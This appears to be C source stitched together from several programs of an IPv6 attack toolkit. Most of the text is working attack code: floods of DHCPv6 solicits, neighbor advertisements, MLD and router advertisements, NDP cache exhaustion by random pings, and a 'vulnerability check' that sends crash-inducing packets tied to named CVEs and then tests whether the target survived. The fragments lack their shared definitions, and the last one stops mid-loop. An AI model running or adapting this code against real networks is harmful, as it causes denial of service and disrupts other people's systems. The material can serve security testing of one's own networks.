int main(int argc, char *argv[]) {
char *interface, string[] = "ip6 and icmp6";
unsigned char *mac6, buf[512];
unsigned char *dst = thc_resolve6("ff02::2");
int i;
unsigned char *pkt = NULL;
int pkt_len = 0;
int rawmode = 0;
pcap_t *p;
if (argc < 2 || strncmp(argv[1], "-h", 2) == 0)
help(argv[0]);
while ((i = getopt(argc, argv, "r")) >= 0) {
switch (i) {
case 'r':
thc_ipv6_rawmode(1);
rawmode = 1;
break;
default:
fprintf(stderr, "Error: invalid option %c\n", i);
exit(-1);
}
}
interface = argv[optind];
if ((mac6 = thc_get_own_mac(interface)) == NULL) {
fprintf(stderr, "Error: invalid interface %s\n", interface);
exit(-1);
}
if (argc - optind > 1 && argv[optind + 1] != NULL)
dst = thc_resolve6(argv[optind + 1]);
memset(buf, 0, sizeof(buf));
buf[0] = 1;
buf[1] = 1;
memcpy(buf + 2, mac6, 6);
i = 8;
memset(seen, 0, sizeof(seen));
if ((p = thc_pcap_init(interface, string)) == NULL) {
fprintf(stderr, "Error: could not capture on interface %s with string %s\n", interface, string);
exit(-1);
}
if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, NULL, dst, 255, 0, 0, 0xe0, 0)) == NULL)
return -1;
if (thc_add_icmp6(pkt, &pkt_len, ICMP6_ROUTERSOL, 0, 0, buf, i, 0) < 0)
return -1;
if (thc_generate_and_send_pkt(interface, mac6, NULL, pkt, &pkt_len) < 0)
return -1;
signal(SIGALRM, clean_exit);
alarm(5);
while (1) {
while (thc_pcap_check(p, (char *) dump_ra_reply, NULL) > 0);
usleep(100);
}
return 0;
}
void check_packets(u_char * foo, const struct pcap_pkthdr *header, const unsigned char *data) {
int len = header->caplen, pkt_len = 0, mlen = 10, olen;
unsigned char *ptr = (unsigned char *) data, *pkt = NULL;
char *smac, mac[6] = { 0, 0x0d, 0, 0x0d, 0x0d, 0x0e };
char mybuf[1024] = { 0x03, 0, 0, 0, 0, 8, 0, 2, 0, 0 };
if (len < 140 || data[20] != NXT_UDP || data[62] != 2)
return;
data += 62;
len -= 62;
memcpy(mybuf + 1, data + 1, 3);
data += 4;
len -= 4;
while (len >= 4) {
if ((olen = data[2] * 256 + data[3]) > len - 4 || olen < 0) {
printf("Information: evil packet received\n");
olen = 0;
len = -1;
} else {
if (data[1] > 1 && data[1] <= 3) {
memcpy(mybuf + mlen, data, olen + 4);
mlen += olen + 4;
} else if (data[1] == 1) {
memcpy(mybuf + mlen, data, olen + 4);
mlen += olen + 4;
//smac auf client mac in paket setzen
if (olen == 14)
smac = (char *) (data + 12);
else
smac = mac;
} else if (data[1] == 39 && do_dns) {
memcpy(mybuf + mlen, data, olen + 4);
mybuf[mlen + 4] = 1; // force server to write dns entry
mlen += olen + 4;
}
data += olen + 4;
len -= olen + 4;
if (len < 0) {
printf("Information: evil packet received\n");
len = -1;
}
}
}
if (len >= 0) {
counter++;
if ((pkt = thc_create_ipv6(interface, PREFER_LINK, &pkt_len, ptr + 38, ptr + 22, 1, 0, 0, 0, 0)) == NULL)
return;
if (thc_add_udp(pkt, &pkt_len, 546, 547, 0, mybuf, mlen) < 0)
return;
if (thc_generate_and_send_pkt(interface, smac, ptr + 6, pkt, &pkt_len) < 0)
return;
pkt = thc_destroy_packet(pkt);
if (counter % 100 == 0)
printf("!");
}
}
void send_rs_reply(u_char *foo, const struct pcap_pkthdr *header, const unsigned char *data) {
unsigned char *pkt = NULL, *dstmac = (unsigned char *) data + 6, *dst = (unsigned char *) data + 14 + 8, *ipv6hdr = (unsigned char *) (data + 14);
int pkt_len = 0, cnt, i;
if (ipv6hdr[6] != NXT_ICMP6 || ipv6hdr[40] != ICMP6_ROUTERSOL || header->caplen < 14 + 40 + 2)
return;
if ((pkt = thc_create_ipv6_extended(frint, PREFER_LINK, &pkt_len, frip6, dst, 255, 0, 0, 0xe0, 0)) == NULL)
return;
if (do_hop) {
type = NXT_HBH;
if (thc_add_hdr_hopbyhop(pkt, &pkt_len, frbuf2, frbuf2len) < 0)
return;
}
if (do_frag) {
type = NXT_FRAG;
for (i = 0; i <= do_frag; i++)
if (thc_add_hdr_oneshotfragment(pkt, &pkt_len, cnt++) < 0)
return;
}
if (do_dst) {
if (type == NXT_ICMP6)
type = NXT_DST;
if (thc_add_hdr_dst(pkt, &pkt_len, buf3, sizeof(buf3)) < 0)
return;
}
if (thc_add_icmp6(pkt, &pkt_len, ICMP6_ROUTERADV, 0, 0xff080800, frbuf, frbuflen, 0) < 0)
return;
if (do_dst) {
thc_generate_pkt(frint, frmac, dstmac, pkt, &pkt_len);
frhdr = (thc_ipv6_hdr *) pkt;
thc_send_as_fragment6(frint, frip6, dst, type, frhdr->pkt + 40 + myoff, frhdr->pkt_len - 40 - myoff, 1240);
} else {
if (thc_generate_and_send_pkt(frint, frmac, dstmac, pkt, &pkt_len) < 0)
return;
}
pkt = thc_destroy_packet(pkt);
}
int main(int argc, char *argv[]) {
int test = 0, count = 1, tmplen;
unsigned char buf[1500], bla[1500], tests[256], string[64] = "ip6 and dst ", string2[64] = "ip6 and src ";
unsigned char *dst6, *ldst6 = malloc(16), *src6, *lsrc6, *mcast6, *route6, *mal;
unsigned char *srcmac = NULL, *dstmac = NULL, *routers[2], null_buffer[6];
thc_ipv6_hdr *hdr;
int i = 0, j, srcmtu, fragsize, offset = 14;
pcap_t *p;
unsigned char *pkt = NULL, *pkt2 = NULL, *pkt3 = NULL;
int pkt_len = 0, pkt_len2 = 0, pkt_len3 = 0, noping = 0, mtu = 1500;
char *interface;
thc_ipv6_hdr *ipv6;
if (argc < 3 || strncmp(argv[1], "-h", 2) == 0)
help(argv[0]);
if (strcmp(argv[1], "-r") == 0) {
thc_ipv6_rawmode(1);
rawmode = 1;
argv++;
argc--;
}
if (strcmp(argv[1], "-p") == 0) {
noping = 1;
argv++;
argc--;
}
if (do_hdr_size)
offset = do_hdr_size;
interface = argv[1];
dst6 = thc_resolve6(argv[2]);
route6 = thc_resolve6("2a01::");
memcpy(ldst6, dst6, 16);
memset(ldst6 + 2, 0, 6);
ldst6[0] = 0xfe;
ldst6[1] = 0x80;
mcast6 = thc_resolve6("ff02::1");
if (argc >= 4)
test = atoi(argv[3]);
memset(buf, 0, sizeof(buf));
memset(null_buffer, 0, sizeof(null_buffer));
src6 = thc_get_own_ipv6(interface, dst6, PREFER_GLOBAL);
if ((lsrc6 = thc_get_own_ipv6(interface, ldst6, PREFER_LINK)) == NULL) {
fprintf(stderr, "Error: invalid interface %s\n", interface);
exit(-1);
}
strcat(string, thc_ipv62notation(src6));
strcat(string2, thc_ipv62notation(dst6));
srcmac = thc_get_own_mac(interface);
if (rawmode == 0) {
if ((dstmac = thc_get_mac(interface, src6, dst6)) == NULL) {
fprintf(stderr, "ERROR: Can not resolve mac address for %s\n", argv[2]);
exit(-1);
}
} else
dstmac = null_buffer;
if ((srcmtu = thc_get_mtu(interface)) <= 0) {
fprintf(stderr, "ERROR: can not get mtu from interface %s\n", interface);
exit(-1);
}
if (do_hdr_size)
srcmtu -= (do_hdr_size - 14);
fragsize = ((srcmtu - 62) / 8) * 8;
if ((p = thc_pcap_init(interface, string)) == NULL) {
fprintf(stderr, "Error: could not capture on interface %s with string %s\n", interface, string);
exit(-1);
}
setvbuf(stdout, NULL, _IONBF, 0);
memset(tests, 0, sizeof(tests));
printf("Performing vulnerability checks on %s via %s:\n", argv[2], argv[1]);
if (noping == 0 && check_alive(p, interface, src6, dst6) == 0) {
fprintf(stderr, "Error: target %s is not alive via direct ping6!\n", argv[2]);
exit(-1);
} else
printf("Test 0: normal ping6\t\t\t\tPASSED - we got a reply\n");
/********************** TEST CASES ************************/
if (test == 0 || test == count) { // 1432
printf("Test %2d: CVE-NONE overlarge ping, 6 checksum combinations\n", count);
tmplen = 65864;
if ((mal = malloc(tmplen)) == NULL)
return -1;
memset(mal, count % 256, tmplen);
if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL)
return -1;
thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, mal, tmplen, 0);
if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0)
return -1;
hdr = (thc_ipv6_hdr *) pkt;
if (thc_send_as_fragment6(interface, src6, dst6, NXT_ICMP6, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, fragsize) < 0)
return -1;
// because of the different possible checksum calculations we have to do them all
hdr->pkt[offset + 40 + 3] = 0xe5;
if (thc_send_as_fragment6(interface, src6, dst6, NXT_ICMP6, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, fragsize) < 0)
return -1;
hdr->pkt[offset + 40 + 2] = 0x98;
hdr->pkt[offset + 40 + 3] = 0xa4;
if (thc_send_as_fragment6(interface, src6, dst6, NXT_ICMP6, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, fragsize) < 0)
return -1;
hdr->pkt[offset + 40 + 3] = 0xa3;
if (thc_send_as_fragment6(interface, src6, dst6, NXT_ICMP6, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, fragsize) < 0)
return -1;
hdr->pkt[offset + 40 + 2] = 0x84;
hdr->pkt[offset + 40 + 3] = 0x90;
if (thc_send_as_fragment6(interface, src6, dst6, NXT_ICMP6, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, fragsize) < 0)
return -1;
hdr->pkt[offset + 40 + 3] = 0x8f;
if (thc_send_as_fragment6(interface, src6, dst6, NXT_ICMP6, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, fragsize) < 0)
return -1;
free(mal);
pkt = thc_destroy_packet(pkt);
}
count++;
if (test == 0 || test == count) { // 1432
printf("Test %2d: CVE-NONE large ping, 3 checksum combinations\n", count);
tmplen = 65527;
if ((mal = malloc(tmplen)) == NULL)
return -1;
memset(mal, count % 256, tmplen);
if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL)
return -1;
thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, mal, tmplen, 0);
if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0)
return -1;
hdr = (thc_ipv6_hdr *) pkt;
if (thc_send_as_fragment6(interface, src6, dst6, NXT_ICMP6, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, fragsize) < 0)
return -1;
// because of the different possible checksum calculations we have to do them all
hdr->pkt[offset + 40 + 2] = 0x31;
hdr->pkt[offset + 40 + 3] = 0x8c;
thc_send_as_fragment6(interface, src6, dst6, NXT_ICMP6, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, fragsize);
hdr->pkt[offset + 40 + 3] = 0x8a;
thc_send_as_fragment6(interface, src6, dst6, NXT_ICMP6, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, fragsize);
free(mal);
pkt = thc_destroy_packet(pkt);
}
count++;
if (test == 0 || test == count) {
printf("Test %2d: CVE-2003-0429 bad prefix length (little information, implementation unsure\n", count);
memset(bla, count % 256, sizeof(bla));
if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL)
return -1;
memset(buf, 0, sizeof(buf));
buf[6] = 4; // 4-7: retrans timer
// option mtu
buf[8] = 5;
buf[9] = 1;
buf[12] = mtu / 16777216;
buf[13] = (mtu % 16777216) / 65536;
buf[14] = (mtu % 65536) / 256;
buf[15] = mtu % 256;
// option prefix
buf[16] = 3;
buf[17] = 4;
buf[18] = 128; // prefix length // BUG IS HERE
buf[19] = 128 + 64;
memset(&buf[20], 17, 4);
memset(&buf[24], 4, 4);
memcpy(&buf[32], route6, 16);
i += 28;
// mac address option
buf[i++] = 1;
buf[i++] = 1;
memcpy(buf + i, srcmac, 6);
i += 6;
// default route routing option
buf[i++] = 0x18; // routing entry option type
buf[i++] = 0x03; // length 3 == 24 bytes
buf[i++] = 0x00; // prefix length
buf[i++] = 0x08; // priority, highest of course
i += 2; // 52-53 unknown
buf[i++] = 0x11; // lifetime, word
buf[i++] = 0x11; // lifetime, word
i += 16; // 56-71 address, all zeros for default
thc_add_icmp6(pkt, &pkt_len, ICMP6_ROUTERADV, 0, count, (unsigned char *) &buf, i, 0);
if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0)
return -1;
pkt = thc_destroy_packet(pkt);
}
count++;
if (test == 0 || test == count) {
printf("Test %2d: CVE-2004-0257 ping, send toobig on reply, then SYN pkt\n", count);
memset(bla, count % 256, sizeof(bla));
memset(buf, 0, sizeof(buf));
if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src6, dst6, 64, 0, 0, 0, 0)) == NULL)
return -1;
if (thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, 0xfacebabe, (unsigned char *) &bla, 68, 0) < 0)
return -1;
if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0)
return -1;
ipv6 = (thc_ipv6_hdr *) pkt;
thc_inverse_packet(ipv6->pkt + offset, ipv6->pkt_len - offset);
sleep(1);
thc_toobig6(interface, src6, srcmac, dstmac, 68, ipv6->pkt + offset, ipv6->pkt_len - offset);
i = 0;
while (ports[i] != 0) {
if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src6, dst6, 0, 0, 0, 0, 0)) == NULL)
return -1;
if (thc_add_tcp(pkt, &pkt_len, 1100 + i * 100, ports[i], i * 1000, 0, TCP_SYN, 5760, 0, NULL, 0, NULL, 0) < 0)
return -1;
if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0)
return -1;
pkt = thc_destroy_packet(pkt);
pkt_len = 0;
i++;
}
}
count++;
/*
if (test == 0 || test == count) {
printf("Test %2d: CVE-20\n", count);
memset(bla, count % 256, sizeof(bla));
memset(buf, 0, sizeof(buf));
if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL)
return -1;
buf[0] = 0;
thc_add_icmp6(pkt, &pkt_len, ICMP6_ROUTERADV, 0, count, (unsigned char *) &buf, i, 0);
if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0)
return -1;
pkt = thc_destroy_packet(pkt);
}
count++;
if (test == 0 || test == count) {
printf("Test %2d: CVE-20\n", count);
memset(bla, count % 256, sizeof(bla));
memset(buf, 0, sizeof(buf));
if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL)
return -1;
buf[0] = 0;
thc_add_icmp6(pkt, &pkt_len, ICMP6_ROUTERADV, 0, count, (unsigned char *) &buf, i, 0);
if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0)
return -1;
pkt = thc_destroy_packet(pkt);
}
count++;
*/
/*
if (test == 0 || test == count) {
printf("Test %2d: CVE-20\n", count);
memset(bla, count%256, sizeof(bla));
memset(buf, 0, sizeof(buf));
if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL)
return -1;
buf[0] = 0;
thc_add_icmp6(pkt, &pkt_len, ICMP6_ROUTERADV, 0, count, (unsigned char *) &buf, i, 0);
if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0)
return -1;
pkt = thc_destroy_packet(pkt);
}
count++;
*/
// more?
/******************* END OF TESTCASES ***************************/
if (noping == 1 || check_alive(p, interface, src6, dst6))
printf("Test %2d: normal ping6 (still alive?)\t\tPASSED - we got a reply\n", count);
else
printf("Test %2d: normal ping6 (still alive?)\t\tFAILED - target is unavailable now!\n", count);
thc_pcap_close(p);
return 0;
}
int main(int argc, char *argv[]) {
char mac[6] = { 0, 0x0c, 0, 0, 0, 0 }, *pkt = NULL;
char wdatabuf[1024];
unsigned char *mac6 = mac, *src, *dst;
int i, s, len, pkt_len = 0, dlen = 0;
unsigned long long int count = 0;
pcap_t *p = NULL;
int do_all = 1, use_real_mac = 0, use_real_link = 0;
if (argc < 2 || strncmp(argv[1], "-h", 2) == 0)
help(argv[0]);
if (getenv("THC_IPV6_PPPOE") != NULL || getenv("THC_IPV6_6IN4") != NULL) printf("WARNING: %s is not working with injection!\n", argv[0]);
while ((i = getopt(argc, argv, "d:nNr1")) >= 0) {
switch (i) {
case 'N':
use_real_link = 1; // no break
case 'n':
use_real_mac = 1;
break;
case '1':
do_all = 0;
break;
case 'd':
do_dns = 1;
dns_name = optarg;
break;
case 'r':
i = 0;
break; // just to ignore -r
default:
fprintf(stderr, "Error: unknown option -%c\n", i);
exit(-1);
}
}
memset(mac, 0, sizeof(mac));
interface = argv[optind];
if (use_real_link)
src = thc_get_own_ipv6(interface, NULL, PREFER_LINK);
else
src = thc_resolve6("fe80::");
if (use_real_mac)
mac6 = thc_get_own_mac(interface);
if (argc - optind <= 1)
dst = thc_resolve6("ff02::1:2");
else
dst = thc_resolve6(argv[optind + 1]);
setvbuf(stdout, NULL, _IONBF, 0);
setvbuf(stderr, NULL, _IONBF, 0);
if (src == NULL || mac6 == NULL) {
fprintf(stderr, "Error: invalid interface %s or bad mac/IP defined\n", interface);
exit(-1);
}
// only to prevent our system to send icmp port unreachable messages
if ((s = thc_bind_udp_port(546)) < 0)
fprintf(stderr, "Warning: could not bind to 546/udp\n");
if ((p = thc_pcap_init_promisc(interface, "ip6 and udp and dst port 546")) == NULL) {
fprintf(stderr, "Error: can not open interface %s in promisc mode\n", interface);
exit(-1);
}
len = sizeof(solicit);
memcpy(wdatabuf, solicit, len);
if (do_dns) {
memcpy(wdatabuf + len, dnsupdate1, sizeof(dnsupdate1));
dlen = len + 8;
len += sizeof(dnsupdate1);
if (dns_name != NULL && strlen(dns_name) < 240) {
if (dns_name[0] != '.') {
wdatabuf[len] = '.';
wdatabuf[dlen - 5]++;
wdatabuf[dlen - 3]++;
len++;
}
memcpy(wdatabuf + len, dns_name, strlen(dns_name) + 1);
wdatabuf[dlen - 5] += strlen(dns_name) + 1;
wdatabuf[dlen - 3] += strlen(dns_name) + 1;
len += strlen(dns_name) + 1;
}
memcpy(wdatabuf + len, dnsupdate2, sizeof(dnsupdate2));
len += sizeof(dnsupdate2);
}
printf("Starting to flood dhcp6 servers locally on %s (Press Control-C to end) ...\n\n", interface);
while (1) {
count++;
if (!use_real_link)
memcpy(src + 8, (char *) &count, 8);
// start0: 1-3 rand, 18-21 rand, 22-27 mac, 32-35 rand
for (i = 0; i < 3; i++) {
wdatabuf[i + 32] = rand() % 256;
wdatabuf[i + 18] = rand() % 256;
mac[i + 2] = rand() % 256;
if (do_dns)
wdatabuf[i + dlen] = 'a' + rand() % 26;
}
if (!use_real_mac)
memcpy(wdatabuf + 22, mac, 6);
memcpy(wdatabuf + 1, (char *) &count + _TAKE3, 3);
if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src, dst, 1, 0, 0, 0, 0)) == NULL)
return -1;
if (thc_add_udp(pkt, &pkt_len, 546, 547, 0, wdatabuf, len) < 0)
return -1;
// we have to tone it down, otherwise we will not get advertisements
if (thc_generate_and_send_pkt(interface, mac6, NULL, pkt, &pkt_len) < 0)
printf("!");
pkt = thc_destroy_packet(pkt);
if (do_all) {
usleep(75);
while (thc_pcap_check(p, (char *) check_packets, NULL) > 0);
}
if (count % 1000 == 0)
printf(".");
}
return 0; // never reached
}
int main(int argc, char *argv[]) {
char *interface, mac[6] = "";
unsigned char *mac6 = mac, *ip6;
unsigned char buf[24], srcmac[8] = "", *smac = NULL;
unsigned char *dst = thc_resolve6("ff02::1"), *dstmac = thc_get_multicast_mac(dst);
int i;
unsigned char *pkt = NULL;
int pkt_len = 0, flags, rawmode = 0, count = 0, prefer = PREFER_LINK, keepmac = 0;
if (argc > 2 && strncmp(argv[1], "-k", 2) == 0) {
keepmac = 1;
if ((smac = thc_get_own_mac(argv[2])) == NULL) {
fprintf(stderr, "Error: invalid interface %s\n", argv[2]);
exit(-1);
}
argv++;
argc--;
}
if (argc > 2 && strncmp(argv[1], "-m", 2) == 0) {
sscanf(argv[2], "%x:%x:%x:%x:%x:%x", (unsigned int *) &srcmac[0], (unsigned int *) &srcmac[1], (unsigned int *) &srcmac[2], (unsigned int *) &srcmac[3],
(unsigned int *) &srcmac[4], (unsigned int *) &srcmac[5]);
smac = srcmac;
argv+=2;
argc-=2;
}
if (smac != NULL)
mac6 = smac;
if (argc < 2 || argc > 4 || strncmp(argv[1], "-h", 2) == 0)
help(argv[0]);
srand(time(NULL) + getpid());
setvbuf(stdout, NULL, _IONBF, 0);
interface = argv[1];
if (thc_get_own_mac(interface) == NULL) {
fprintf(stderr, "Error: invalid interface %s\n", interface);
exit(-1);
}
if (argc == 3) {
if ((dst = thc_resolve6(argv[2])) == NULL) {
fprintf(stderr, "Error: invalid target IPv6 address\n");
exit(-1);
} else {
dstmac = thc_get_mac(interface, NULL, dst);
}
if (dst[0] >= 0x20 && dst[0] <= 0xfd)
prefer = PREFER_GLOBAL;
}
ip6 = thc_get_own_ipv6(interface, dst, prefer);
mac[0] = 0x00;
mac[1] = 0x18;
memset(ip6 + 8, 0, 8);
ip6[8] = 0x02;
ip6[9] = mac[1];
ip6[11] = 0xff;
ip6[12] = 0xfe;
memset(buf, 0, sizeof(buf));
buf[16] = 2;
buf[17] = 1;
buf[18] = mac[0];
buf[19] = mac[1];
memcpy(buf, ip6, 16);
flags = ICMP6_NEIGHBORADV_OVERRIDE;
printf("Starting to flood network with neighbor advertisements on %s (Press Control-C to end, a dot is printed for every 1000 packets):\n", interface);
while (1) {
for (i = 2; i < 6; i++)
mac[i] = rand() % 256;
// ip6[9] = mac[1];
ip6[10] = mac[2];
ip6[13] = mac[3];
ip6[14] = mac[4];
ip6[15] = mac[5];
count++;
memcpy(buf + 10, ip6 + 10, 6);
memcpy(&buf[20], mac + 2, 4);
if ((pkt = thc_create_ipv6_extended(interface, prefer, &pkt_len, ip6, dst, 255, 0, 0, 0, 0)) == NULL)
return -1;
if (thc_add_icmp6(pkt, &pkt_len, ICMP6_NEIGHBORADV, 0, flags, buf, sizeof(buf), 0) < 0)
return -1;
if (thc_generate_and_send_pkt(interface, mac6, dstmac, pkt, &pkt_len) < 0) {
// fprintf(stderr, "Error sending packet no. %d on interface %s: ", count, interface);
// perror("");
// return -1;
printf("!");
}
pkt = thc_destroy_packet(pkt);
// usleep(1);
if (count % 1000 == 0)
printf(".");
}
return 0;
}
int main(int argc, char *argv[]) {
char *interface, mac[6] = "";
unsigned char *mac6 = mac, *ip6 = thc_resolve6("fe80::ff:fe00:0");
unsigned char buf[6];
unsigned char *dst = thc_resolve6("ff02::6a"), *dstmac = thc_get_multicast_mac(dst);
int i;
unsigned char *pkt = NULL;
int pkt_len = 0;
int rawmode = 0;
int count = 0;
if (argc < 2 || argc > 4 || strncmp(argv[1], "-h", 2) == 0)
help(argv[0]);
if (strcmp(argv[1], "-r") == 0) {
thc_ipv6_rawmode(1);
rawmode = 1;
argv++;
argc--;
}
srand(time(NULL) + getpid());
setvbuf(stdout, NULL, _IONBF, 0);
interface = argv[1];
if (thc_get_own_mac(interface) == NULL) {
fprintf(stderr, "Error: invalid interface %s\n", interface);
exit(-1);
}
if (argc > 2)
if ((dst = thc_resolve6(argv[2])) == NULL) {
fprintf(stderr, "Error: can not resolve %s\n", argv[2]);
exit(-1);
}
memset(buf, 0, sizeof(buf));
mac[0] = 0x00;
mac[1] = 0x18;
ip6[9] = mac[1];
printf("Starting to flood network with MLD router advertisements on %s (Press Control-C to end, a dot is printed for every 1000 packets):\n", interface);
while (1) {
for (i = 0; i < 4; i++)
mac[2 + i] = rand() % 256;
// ip6[9] = mac[1];
ip6[10] = mac[2];
ip6[13] = mac[3];
ip6[14] = mac[4];
ip6[15] = mac[5];
count++;
if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, ip6, dst, 1, 0, 0, 0, 0)) == NULL)
return -1;
if (thc_add_icmp6(pkt, &pkt_len, ICMP6_MLD_ROUTERADV, 15, 0x00300006, buf, 0, 0) < 0)
return -1;
if (thc_generate_and_send_pkt(interface, mac6, dstmac, pkt, &pkt_len) < 0) {
// fprintf(stderr, "Error sending packet no. %d on interface %s: ", count, interface);
// perror("");
// return -1;
printf("!");
}
pkt = thc_destroy_packet(pkt);
// usleep(1);
if (count % 1000 == 0)
printf(".");
}
return 0;
}
int main(int argc, char *argv[]) {
char *interface;
int prefer = PREFER_GLOBAL;
unsigned char *srcmac;
unsigned char *dst6, *src6;
unsigned char *ptr;
//char dstmac[6] = "";
unsigned char *dstmac = NULL, *tmpmac, *dstnet;
int pkt_len = 16;
int count = 0;
int i;
int size, numbytes, samenet = 0;
unsigned char *pkt = NULL;
unsigned char buf[] = "NDP Exhaustion";
// hardcoded mac
/*dstmac[0] = 0x00;
dstmac[1] = 0x05;
dstmac[2] = 0x73;
dstmac[3] = 0xa0;
dstmac[4] = 0x00;
dstmac[5] = 0x01; */
setvbuf(stdout, NULL, _IONBF, 0);
setvbuf(stderr, NULL, _IONBF, 0);
if (argc < 3 || strncmp(argv[1], "-h", 2) == 0)
help(argv[0]);
interface = argv[1];
if ((srcmac = thc_get_own_mac(interface)) == NULL) {
printf("Error: invalid interface defined: %s\n", interface);
exit(-1);
}
dstnet = argv[2]; // hier stehts dstnet drin
if (dstnet == NULL || (ptr = index(dstnet, '/')) == NULL) {
printf("Error: Option must be supplied as IP-ADDRESS/PREFIXLENGTH, e.g. ff80::01/16\n");
exit(-1);
}
*ptr++ = 0;
size = atoi(ptr); // prefix lenght
// printf("Prefix length is %d\n", size);
if (size != 64)
fprintf(stderr, "Warning: unusual network prefix size defined, be sure what your are doing: %d\n", size);
numbytes = (128 - size) / 8; // number of bytes to create
// printf("Creating %d random adress bytes\n", numbytes);
srand(time(NULL) + getpid()); // initalize random number generator
dst6 = thc_resolve6(dstnet);
// thc_dump_data(dst6, 16, "dst");
if (argc >= 4)
src6 = thc_resolve6(argv[3]);
else
src6 = thc_get_own_ipv6(interface, dst6, PREFER_GLOBAL);
// thc_dump_data(src6, 16, "src");
dstmac = thc_get_mac(interface, src6, dst6);
printf("Starting to randomly ping addresses in network %s/%d on %s:\n", dstnet, size, interface);
while (1) {
++count;
for (i = 0; i < numbytes; i++) {
dst6[16 - numbytes + i] = rand() % 256; // direct destination manipulation
}
if (count == 1) {
tmpmac = thc_get_mac(interface, src6, dst6);
if (tmpmac != NULL && dstmac != NULL && memcmp(dstmac, tmpmac, 6) == 0)
samenet = 1;
} else {
if (samenet == 0) {
free(dstmac);
dstmac = thc_get_mac(interface, src6, dst6);
}
}
// printf("%s\n", ip6adr);
// printf("Sending ICMP ECHO to %s\n", ip6adr);
if ((pkt = thc_create_ipv6(interface, prefer, &pkt_len, src6, dst6, 64, 0, 0, 0, 0)) == NULL)
errx(EXIT_FAILURE, "THC: Could not create IPv6 packet\n");
if (thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, 0xfacebabe, buf, sizeof(buf), 0) == -1)
errx(EXIT_FAILURE, "THC: Could not add ICMP6 packet contents\n");
//thc_add_udp(pkt, &pkt_len, 53, 53, 0, buf, sizeof(buf));
if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0)
printf("!");
thc_destroy_packet(pkt);
usleep(1);
if (count % 100 == 0)
printf(".");
}
}
int main(int argc, char *argv[]) {
char *interface, mac[6] = "";
unsigned char *routerip6, *route6, *mac6 = mac, *ip6;
unsigned char buf[56], buf2[6], buf3[1504];
unsigned char *dst = thc_resolve6("FF02::1"), *dstmac = thc_get_multicast_mac(dst);
int size, mtu, i, type = NXT_ICMP6;
unsigned char *pkt = NULL;
int pkt_len = 0, rawmode = 0, count = 0, do_hop = 0, do_frag = 0, cnt, do_dst = 0;
thc_ipv6_hdr *hdr = NULL;
if (argc < 2 || strncmp(argv[1], "-h", 2) == 0)
help(argv[0]);
while ((i = getopt(argc, argv, "DFHr")) >= 0) {
switch (i) {
case 'r':
thc_ipv6_rawmode(1);
rawmode = 1;
break;
case 'F':
do_frag++;
break;
case 'H':
do_hop = 1;
break;
case 'D':
do_dst = 1;
break;
default:
fprintf(stderr, "Error: invalid option %c\n", i);
exit(-1);
}
}
if (argc - optind < 1)
help(argv[0]);
srand(time(NULL) + getpid());
setvbuf(stdout, NULL, _IONBF, 0);
interface = argv[optind];
mtu = 1500;
size = 64;
ip6 = malloc(16);
routerip6 = malloc(16);
route6 = malloc(16);
mac[0] = 0x00;
mac[1] = 0x18;
memset(ip6, 0, 16);
ip6[0] = 0xfe;
ip6[1] = 0x80;
ip6[8] = 0x02;
ip6[9] = mac[1];
ip6[11] = 0xff;
ip6[12] = 0xfe;
routerip6[0] = 0x2a;
routerip6[1] = 0x01;
routerip6[15] = 0x01;
memset(route6 + 8, 0, 8);
memset(buf2, 0, sizeof(buf2));
memset(buf3, 0, sizeof(buf3));
memset(buf, 0, sizeof(buf));
buf[1] = 250;
buf[5] = 30;
buf[8] = 5;
buf[9] = 1;
buf[12] = mtu / 16777216;
buf[13] = (mtu % 16777216) / 65536;
buf[14] = (mtu % 65536) / 256;
buf[15] = mtu % 256;
buf[16] = 3;
buf[17] = 4;
buf[18] = size;
buf[19] = 128 + 64 + 32;
memset(&buf[20], 255, 8);
buf[48] = 1;
buf[49] = 1;
printf("Starting to flood network with router advertisements on %s (Press Control-C to end, a dot is printed for every 100 packet):\n", interface);
while (1) {
for (i = 2; i < 6; i++)
mac[i] = rand() % 256;
for (i = 2; i < 8; i++)
